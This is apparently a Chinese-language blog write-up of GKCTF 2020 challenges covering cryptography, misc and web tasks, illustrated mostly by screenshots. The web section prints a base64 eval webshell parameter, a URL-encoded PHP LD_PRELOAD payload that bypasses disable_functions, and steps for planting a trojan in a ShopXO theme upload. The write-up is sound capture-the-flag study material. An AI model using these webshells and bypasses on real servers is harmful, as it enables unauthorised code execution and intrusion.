-->
当前位置:首页 > DayDayUp > 正文内容

[WP]GKCTF 2020

Luz4年前 (2020-05-24)DayDayUp4113

image.png

仿射密码解密

image.png

密文

image.png

base64加密得到flag


image.png

当铺密码解密

image.png

发现'FLAG'十进制ascii位69+1,74+2,62+3...

写脚本解密

image.png


image.png

RSA已知高位求低位

参考强网杯2019

image.png

链接

基本一样的题目


image.png


image.png

gba模拟器,一路向北看到flag

image.png



image.png

二维码拼了很久也没扫出来


image.png

重绘了一下

扫一扫base(gkctf)

base58加密'gkctf'得到压缩包密码


解压得到混淆的js和图片

image.png


image.png


解密js得到

image.png


一个按字节替换的脚本

粗略地替换一下

#include <stdio.h>
int main(){
print("w3lc0me_4o_9kct5");
return
}

得到C代码 括号里的就是flag


image.png


截取原始音乐的最后一段(DTMF音)


image.png


解密后对照九键键盘得到ctfiseun


eun感觉有点问题

image.png

audacity中发现解密密文中#2228333444777733(这里少了一个3)8866#


得到密钥ctfisfun

image.png

Free_File_camouflage解密得到flag


image.png


找到密码HelloWorld进去玩局打砖块得到flag

image.png


image.png

参考:https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD

打开靶机,get传入一个 Ginkgo=ZXZhbCgkX1BPU1RbJ2EnXSk7 ,使用蚁剑连接新马,

向/tmp/文件夹传入一个bypass_disablefunc_x64.so ,把新代码使用url加密后使用POST传入,进去执行/readflag

Ginkgo=ZXZhbCgkX1BPU1RbJ2EnXSk7&cmd=/readflag&outpath=/tmp/xx&sopath=/tmp/bypass_disablefunc_x64.so

 

a=echo%20%22%3Cp%3E%20%3Cb%3Eexample%3C%2Fb%3E%3A%20http%3A%2F%2Fsite.com%2Fbypass_disablefunc.php%3Fcmd%3Dpwd%26outpath%3D%2Ftmp%2Fxx%26sopath%3D%2Fvar%2Fwww%2Fbypass_disablefunc_x64.so%20%3C%2Fp%3E%22%3B%0A%0A%20%20%20%20%24cmd%20%3D%20%24_GET%5B%22cmd%22%5D%3B%0A%20%20%20%20%24out_path%20%3D%20%24_GET%5B%22outpath%22%5D%3B%0A%20%20%20%20%24evil_cmdline%20%3D%20%24cmd%20.%20%22%20%3E%20%22%20.%20%24out_path%20.%20%22%202%3E%261%22%3B%0A%20%20%20%20echo%20%22%3Cp%3E%20%3Cb%3Ecmdline%3C%2Fb%3E%3A%20%22%20.%20%24evil_cmdline%20.%20%22%3C%2Fp%3E%22%3B%0A%0A%20%20%20%20putenv(%22EVIL_CMDLINE%3D%22%20.%20%24evil_cmdline)%3B%0A%0A%20%20%20%20%24so_path%20%3D%20%24_GET%5B%22sopath%22%5D%3B%0A%20%20%20%20putenv(%22LD_PRELOAD%3D%22%20.%20%24so_path)%3B%0A%0A%20%20%20%20mail(%22%22%2C%20%22%22%2C%20%22%22%2C%20%22%22)%3B%0A%0A%20%20%20%20echo%20%22%3Cp%3E%20%3Cb%3Eoutput%3C%2Fb%3E%3A%20%3Cbr%20%2F%3E%22%20.%20nl2br(file_get_contents(%24out_path))%20.%20%22%3C%2Fp%3E%22%3B%20%0A%0A%20%20%20%20


image.png



image.png

image.png

admin shopxo登录到控制台

去应用商店下载一个主题到本地,把马放到压缩包的

image.png

image.png


网站管理 主题管理 主题安装 上传本地修改过的主题

image.png

进入木马控制台


image.png

发现auto.sh,其运行了文件/var/mail/makeflaghint.py

查看这个文件

image.png


修改文件

image.png

返回查看flag.hint

image.png

得到flag



image.png



评论列表

访客0xfire
4年前 (2020-05-26)

师傅你好,请问您用的这个马是什么,以前见过几次也没找到,求联系

Luz 回复:
我师傅很久以前给我的
4年前 (2020-05-27)

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。